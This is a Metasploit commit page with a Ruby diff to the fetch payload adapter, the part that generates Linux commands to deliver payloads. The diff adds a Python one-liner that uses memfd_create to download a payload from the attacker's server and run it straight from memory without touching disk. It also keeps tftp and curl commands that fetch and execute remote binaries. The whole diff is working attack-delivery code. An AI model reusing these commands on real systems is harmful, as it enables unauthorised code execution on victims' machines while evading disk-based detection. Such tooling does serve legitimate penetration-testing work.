Land rapid7#19943, Fetch payload run fileless ELF with python

Land rapid7#19943, Fetch payload run fileless ELF with python

Author: dledda-r7

lib/msf/core/payload/adapter/fetch.rb

@@ -209,7 +209,9 @@ def _execute_win(get_file_cmd)
   end
 
   def _execute_nix(get_file_cmd)
-    return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS']
+    return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS'] == 'bash'
+    return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS'] == 'python3.8+'
+
 
     cmds = get_file_cmd
     cmds << ";chmod +x #{_remote_destination_nix}"
@@ -232,6 +234,7 @@ def _generate_certutil_command
     end
     _execute_add(get_file_cmd)
   end
+  
 
   # The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains "memfd") with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor
   def _generate_fileless(get_file_cmd)
@@ -258,6 +261,11 @@ def _generate_fileless(get_file_cmd)
 
     cmd
   end
+  
+  # same idea as _generate_fileless function, but force creating anonymous file handle
+  def _generate_fileless_python(get_file_cmd)
+    %Q<python3 -c 'import os;fd=os.memfd_create("",os.MFD_CLOEXEC);os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\";#{get_file_cmd};$f&")'> 
+  end
 
   def _generate_curl_command
     case fetch_protocol
@@ -295,7 +303,7 @@ def _generate_tftp_command
         fetch_command = _execute_win("tftp -i #{srvhost} GET #{srvuri} #{_remote_destination}")
       else
         _check_tftp_file
-        if datastore['FETCH_FILELESS'] && linux?
+        if datastore['FETCH_FILELESS'] != 'none' && linux?
           return _generate_fileless("(echo binary ; echo get #{srvuri} $f ) | tftp #{srvhost}")
         else
           fetch_command = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
@@ -343,7 +351,7 @@ def _remote_destination
   def _remote_destination_nix
     return @remote_destination_nix unless @remote_destination_nix.nil?
 
-    if datastore['FETCH_FILELESS']
+    if datastore['FETCH_FILELESS'] != 'none'
       @remote_destination_nix = '$f'
       return @remote_destination_nix
     end

lib/msf/core/payload/adapter/fetch/linux_options.rb

@@ -4,7 +4,7 @@ def initialize(info = {})
     register_options(
       [
         Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
-        Msf::OptBool.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk, Linux ≥3.17 only', false]),
+        Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'false']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', '/tmp'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'false'])
       ]